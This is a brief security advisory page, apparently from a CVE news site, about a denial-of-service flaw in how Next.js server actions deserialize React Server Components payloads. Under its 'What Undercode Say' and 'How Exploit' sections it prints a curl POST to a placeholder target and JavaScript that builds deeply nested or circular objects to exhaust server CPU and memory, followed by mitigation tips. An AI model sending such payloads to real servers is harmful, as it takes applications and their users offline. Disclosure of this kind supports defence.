Nextjs, HTTP Request Deserialization Denial-of-Service, CVE-2026-23864 (High)

Listen to this Post

This vulnerability exists within the React Server Components (RSC) payload deserialization mechanism used by Next.js App Router Server Functions (Server Actions). The deserialization process, which handles data sent from client components to server functions, does not safely manage deeply nested or recursively referenced object structures. An attacker can craft a malicious HTTP request containing a serialized object with circular references or excessive nesting depth. When the Next.js server attempts to deserialize this payload, it triggers a process that recursively traverses the object graph without proper bounds checking. This leads to uncontrolled consumption of CPU cycles as the parser attempts to resolve the infinite references, and can rapidly allocate memory for each traversal step, resulting in an out-of-memory (OOM) exception. Consequently, a single malicious request can cause the Node.js process to become unresponsive or crash completely, leading to a Denial-of-Service (DoS) condition for the entire application.
Platform: Next.js
Version: 13.x – 16.x
Vulnerability: Deserialization DoS
Severity: High
date: Jan 26 2026

Prediction: Patch Feb 05 2026

What Undercode Say:

npm list next react react-dom
curl -X POST "https://target.com/api/action" -H "Content-Type: text/plain" --data-binary @malicious_payload.bin
// Malicious payload structure
const malicious = {};
let temp = malicious;
for(let i=0; i<100000; i++) { temp.ref = {}; temp = temp.ref; }
// or circular: let a={}; let b={ref:a}; a.ref=b;
fetch('/server-action', { method: 'POST', body: serialize(malicious) })

How Exploit:

Craft recursive object.

POST to Server Action.

Trigger infinite deserialization loop.

Exhaust CPU/memory.

Protection from this CVE

Update to patched versions.

Implement request size limiting.

Use WAF rate-limiting.

Impact:

Application DoS.

Server resource exhaustion.

Unavailable services.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top